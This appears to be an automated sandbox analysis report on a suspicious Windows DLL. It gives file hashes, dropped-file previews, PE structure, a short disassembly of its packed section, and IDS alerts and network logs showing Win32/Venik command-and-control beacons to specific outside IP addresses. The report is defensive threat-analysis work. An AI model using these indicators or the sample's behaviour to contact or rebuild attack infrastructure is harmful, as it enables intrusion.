.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Dec 19 14:44:17 2024, 0x1205a4 type
Category: dropped
Size (bytes): 45142
Entropy (8bit): 2.0268748562150543
Encrypted: false
SSDEEP: 384:DtZ8ZwUH5H7yaFFD0yhQkCWL0j97nwhL:03H57rjhQkby7nw
MD5: F2FD094B1724695F3005A6C7AB74EE02
SHA1: 138868ECC618A40E204F5622074797443C02C607
SHA-256: 2DA85C81AED65F827E04BC83024E578EE7AB84F7935F342EC48B47F1E01DA067
SHA-512: 3E0A468A5BD128102AC223F55154A031D9C82CF7DFDCB524F74A1336B143F17C9C9BCAEECCF434B706706EBFEBA8910AFBBC82BD421FCFEC24722BCDE9223944
Malicious: false
Preview: MDMP..a..... .......A1dg........................................V/..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T...........@1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8268
Entropy (8bit): 3.6913251362383805
Encrypted: false
SSDEEP: 192:R6l7wVeJQm6ZO6Y+Q06gdgmfTxqpr/89beOsf0MKm:R6lXJB6g6YT06SgmfTxfeNfJ
MD5: B747CF30A54004EAD2A8507D07A3A4EC
SHA1: 8FD35FF755ECD00A45B7BAB1D2CC6E2B5E1EA92B
SHA-256: E329FCE0649BE18790D010DB37D4E4CD07A334670214A32C22B7EBA404C8E607
SHA-512: C319E3A167604F8CADF3CCE0D900E99BE70C79EF1E1973E052597FB1DAF6E56974E431F0F37971ED018240FA0ECBD83F85A162760818DCAA9567772BD92B1833
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.3.2.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4654
Entropy (8bit): 4.4615978525860305
Encrypted: false
SSDEEP: 48:cvIwWl8zsMiJg77aI9xWWpW8VYrYm8M4JCdPOFfA+q8/AxRGScSUd:uIjfMwI7b37VXJkJRJ3Ud
MD5: 6328A58BAB041C58B31DDCAD0649E8D3
SHA1: 872C1F64F85EDF8F2802404A193E404398272E8F
SHA-256: 7A9D65C3B79091D2D956EDB718BFC08D65560406FC08EC6E8E19078CFFCAD8CB
SHA-512: F16194EF4890D01BE6D2FBB1AD941C14662DB653CF07358682CB279F46A0BF8C39EA321E6D8F707382DD35DD34C581A5CD2BEB3CC624AA86A081571F139565D2
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:44:13 2024, 0x1205a4 type
Category:dropped
Size (bytes):44432
Entropy (8bit):2.048976631359992
Encrypted:false
SSDEEP:192:BAsZSZwaXzXClDO5H4qB3Zf3sJWuCr5rn/zi2otEfXyrV:jZSZwp65HLBJf8Jo7/zi2iEc
MD5:863EB2E87DFE82D6C4582C0E8295DC8C
SHA1:84CC16504FE7EFF2EC5ED0B965A303C7B4DA6A6A
SHA-256:61A98BE670C585EAC4DD06237D995E4237A9C0C01993906D5555FDC985D36BA3
SHA-512:CC90C557EBA2551269E800BBCAFEB13176C31FDE71880A219B27A92A999A172BC1F3860753D8D3891367930130A481A5A803EF99095BE9DCD70F43FDA970D0A7
Malicious:false
Preview:MDMP..a..... .......=1dg........................................V/..........T.......8...........T..........................L...........8...............................................................................eJ..............GenuineIntel............T...........=1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8272
Entropy (8bit):3.691669945211612
Encrypted:false
SSDEEP:192:R6l7wVeJhC626Yuq6mTgmfTZqprt89b6XsfFJv+m:R6lXJU626YD6mTgmfTZ16cfr
MD5:E150228A9B17F45AD0190ECE2B40C2FF
SHA1:4614967DD1BD5A6591101E514B014E63B8BA3A7C
SHA-256:E1316C12B96F39D34A032C3C3EBBEF17CE3E090F426FDC6726DB0978DB5F9CB9
SHA-512:B67CD4C4FDBEEE5387EB15350EFF324431F9E678709F95BF2354AAC0789EA374E559609380CA6BA553F1B9565011BDC4A145B02B8F8E66FA444EE0C8264A71F8
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.5.6.<./.P.i.

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4654
Entropy (8bit):4.463136913363345
Encrypted:false
SSDEEP:48:cvIwWl8zsMiJg77aI9xWWpW8VYfYm8M4JCdPSFPMo+q8/A2L2GScS6d:uIjfMwI7b37VjJ3Mo5J36d
MD5:AC1E0D303951EB7EDA478ED2A632594A
SHA1:C12A59F941F96E6D1EFA2E82517DB15ACBDD942E
SHA-256:EB3B7A998C39D0DAD265400211B3F27B925CF64F1E9C7058E55D84A30C9A58F7
SHA-512:700E1E085D11A6A86450E3AE81F23A956D3BE383A39AC89414C5AEB4E70B6520D39E42B447AB691BC3747EED97AC29B19EBFA4FE9CF576455D95F397391DD154
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:dropped
Size (bytes):71954
Entropy (8bit):7.996617769952133
Encrypted:true
SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:false
Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:data
Category:dropped
Size (bytes):328
Entropy (8bit):3.254427469235842
Encrypted:false
SSDEEP:6:kK+eV99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VVkDImsLNkPlE99SNxAhUe/3
MD5:B5CE53E7E1E29A8A296639027185D75B
SHA1:3154E861BF18AA192A509FE406429BC9EA1C9EF6
SHA-256:2861363EAC4547FE5C7E369A4D2959997404916FA4EE4B37D0964B97B4E26E69
SHA-512:37CF38D607BA3A28F2DA31ACF9CA570F949C46D7A75C770BAE57220DC3C1843C993C2F229826805257E8B1B2E92B1FD4ADEF96BF15CC7FF9F5F3A822F604823C
Malicious:false
Preview:p...... ..............(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.2988432393311555
Encrypted:false
SSDEEP:6144:dECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lASD6VJSRrf:aCsL6seqD5SlSWVARD
MD5:D82D81E189FFDC8A8127BD98FBDBB842
SHA1:E0F5764738AB07065E9EDBEE539B40C6C0363C49
SHA-256:A21E68F33CDAC2E8B94EB3253A90BF1707DD4056F09AF38F38A8CB5AC0623551
SHA-512:B116A830C2E9B98AE2FA8C19562C4C6E90CAC7CD3993B633477932ECC2A629BA408AD06AD114ED8B183EC3F866AD36A6D1C8E0D5FE591C7E03EFF1BC06A4BBC0
Malicious:false
Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...x$R..............................................................................................................................................................................................................................................................................................................................................8..L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.738266496763094
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:2JSGOlbNym.dll
File size:204'859 bytes
MD5:e3f13188806c9a2ecabf5eab0cf7dc5f
SHA1:bc3a8653c59edabf91eb545f7d9dcf818f3ef003
SHA256:ad2003c10fcffe449f3b5bd445dca19d789eac82d64f0b764104d7b6d0fb955f
SHA512:261711f8b6b002ac344c84afe01e38b4900ac3aae03da16ab049ac39e0c2fd8278bf95e8c53e25e825bcd0938d0b5dad3de584b5f65300fabedd4d3c2a677f0f
SSDEEP:3072:BVkgEz4rVOfek2THpgQqqMkPtghomXHNoh2+fS8BpuSNXVACL7I1:LkgEz4sjOp1tyoGX+fzGM2Co
TLSH:011412D059EA21BAC087C37014B7FD2DEA446575E9694C09EBCAF131BD33B20B86A356
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................
Icon Hash:7ae282899bbab082
Entrypoint:0x10062b8d
Entrypoint Section:.tyi1
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:0x5667D311 [Wed Dec 9 07:06:57 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:e7361d096d72b868eab81a55f14cbe3a

Instruction
jmp 00007FB760BDCCDCh
inc ebx
dec ebx
xchg eax, ecx
mov seg?, word ptr [ecx]
add byte ptr [esp+eax*8], cl
xor ah, ah
add ah, ch
xor al, ch
adc ah, bl
sbb ah, ah
in al, 0Ch
or bh, byte ptr [esi-2A605E18h]
stc
xor ecx, ebx
xor ch, bh
retn 0FB3h
in eax, dx
in eax, dx
in eax, 1Bh
cmp al, 96h
stosd
                                                                                                                                                                        fdivr st(0), st(0)
                                                                                                                                                                        add byte ptr [eax+40h], cl
                                                                                                                                                                        fcmovu st(0), st(4)
                                                                                                                                                                        mov byte ptr [ebx+01h], cl
                                                                                                                                                                        pop es
                                                                                                                                                                        ret
                                                                                                                                                                        cdq
                                                                                                                                                                        wait
                                                                                                                                                                        retn CA45h
                                                                                                                                                                        bound ebx, dword ptr [eax]
                                                                                                                                                                        push ss
                                                                                                                                                                        add esi, dword ptr [ebp-1Eh]
                                                                                                                                                                        and eax, 7E7D35C7h
                                                                                                                                                                        pop esp
                                                                                                                                                                        mov al, byte ptr [A77A8284h]
                                                                                                                                                                        aaa
                                                                                                                                                                        mov dword ptr [edi], edi
                                                                                                                                                                        shr dword ptr [edi+3B26DB69h], FFFFFFEDh
                                                                                                                                                                        cmp dl, byte ptr [edi]
                                                                                                                                                                        dec ebx
                                                                                                                                                                        pop edx
                                                                                                                                                                        loop 00007FB760BF964Dh
                                                                                                                                                                        dec edi
                                                                                                                                                                        idiv byte ptr [edi+4AB2832Ah]
                                                                                                                                                                        cmpsd
                                                                                                                                                                        test dword ptr [ebx+3AC4381Bh], eax
                                                                                                                                                                        xor byte ptr [ebx+3Dh], dh
                                                                                                                                                                        adc ecx, esi
                                                                                                                                                                        aad 35h
                                                                                                                                                                        adc dword ptr [esi], esi
                                                                                                                                                                        les esp, eax
                                                                                                                                                                        aad 1Bh
                                                                                                                                                                        adc eax, ecx
                                                                                                                                                                        nop dword ptr [esi+7Ah]
                                                                                                                                                                        pushfd
                                                                                                                                                                        xchg eax, esp
                                                                                                                                                                        pop esp
                                                                                                                                                                        push edi
                                                                                                                                                                        xchg eax, esp
                                                                                                                                                                        test dword ptr [ebx+6EA66805h], 0049846Dh
                                                                                                                                                                        mov cl, 54h
                                                                                                                                                                        xchg eax, ecx
                                                                                                                                                                        pop esp
                                                                                                                                                                        test dword ptr [eax-4Fh], ebx
                                                                                                                                                                        inc esp
                                                                                                                                                                        inc eax
                                                                                                                                                                        xor byte ptr [eax-70809D72h], cl
                                                                                                                                                                        pop esp
                                                                                                                                                                        xchg eax, ebp
                                                                                                                                                                        test eax, 902FE9EFh
                                                                                                                                                                        xor dword ptr [eax], eax
                                                                                                                                                                        jmp far 1212h : F222CA3Ah
                                                                                                                                                                        ficomp dword ptr [esi]
                                                                                                                                                                        jmp far 393Dh : D602FA06h
                                                                                                                                                                        popad
                                                                                                                                                                        lodsb
                                                                                                                                                                        mov ecx, dword ptr [eax]
                                                                                                                                                                        sbb esp, ebx
                                                                                                                                                                        aaa
                                                                                                                                                                        loopne 00007FB760BF963Fh
                                                                                                                                                                        aaa
                                                                                                                                                                        lodsd
                                                                                                                                                                        xchg eax, edi
                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                        • [ C ] VS98 (6.0) build 8168
                                                                                                                                                                        • [C++] VS98 (6.0) build 8168
                                                                                                                                                                        • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                                                        • [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x68fbc | 0x67 | .tyi1
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x60da4 | 0x118 | .tyi1
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6f000 | 0x1000 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0x9c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6ab88 | 0x7c | .tyi1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x1000 | 0xc50c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xe000 | 0x3571 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x12000 | 0x5fe8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tyi0 | 0x18000 | 0x267e4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.tyi1 | 0x3f000 | 0x2e918 | 0x2f000 | 778f5f322b37508c5946d05e9b738ec7 | False | 0.968256524268617 | data | 7.938472536073559 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x6e000 | 0x9c | 0x1000 | 23ac04b865d4f4fbc6a3c604aa7f6f51 | False | 0.03759765625 | data | 0.26850651604269654 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x6f000 | 0x59c | 0x1000 | 9adb9cc8cac195f47b28f9ca61967dc1 | False | 0.125244140625 | data | 1.2011055032591231 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
RT_DIALOG | 0x6f420 | 0x17c | data | English | United States | 0.034210526315789476
RT_VERSION | 0x6f0a0 | 0x380 | data | English | United States | 0.4732142857142857
DLL | Import
--- | ---
MFC42.DLL |
MSVCRT.dll | strcspn
KERNEL32.dll | GetModuleFileNameA
USER32.dll | GetDesktopWindow
ADVAPI32.dll | RegEnumValueA
WS2_32.dll | htonl
SHLWAPI.dll | PathIsDirectoryA
ole32.dll | CoUninitialize
OLEAUT32.dll | VariantClear
MSVCP60.dll | ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
NETAPI32.dll | Netbios
KERNEL32.dll | GetModuleFileNameW
KERNEL32.dll | GetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess
Name | Ordinal | Address
--- | --- | ---
ClassObject | 1 | 0x10008668
InputFile | 2 | 0x1000679d
PrintFile | 3 | 0x1000443d
Language of compilation system | Country where language is spoken
--- | ---
English | United States
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-12-19T15:44:33.497786+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149706107.163.56.11018530TCP
                                                                                                                                                                        2024-12-19T15:44:35.689380+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149705107.163.56.23118530TCP
                                                                                                                                                                        2024-12-19T15:44:35.689380+01002812407ETPRO MALWARE Win32/Venik HTTP CnC Beacon1192.168.2.1149705107.163.56.23118530TCP
                                                                                                                                                                        2024-12-19T15:44:36.833681+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149718107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:44:43.735527+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149722107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:43.735567+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149723107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:43.735600+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149726116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:45.672388+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149729116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:47.735838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149728107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:47.735838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149730107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:51.735632+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149736116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:51.735671+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149733107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:51.735763+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149734107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:55.876691+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149737107.163.56.23218963TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                        Dec 19, 2024 15:44:43.297776937 CET8049726116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:43.297853947 CET4972680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.298105001 CET4972680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.417670965 CET8049726116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:43.735527039 CET4972218963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.735567093 CET4972318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.735599995 CET4972680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.736924887 CET4972818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.850420952 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.851982117 CET4973018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.856468916 CET1896349728107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:43.856535912 CET4972818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.856717110 CET4972818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.970913887 CET8049729116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:43.970997095 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.971196890 CET4972980192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:44:43.972306967 CET1896349730107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:43.972383022 CET4973018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.972687006 CET4973018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:44:43.977124929 CET1896349728107.163.56.232192.168.2.11
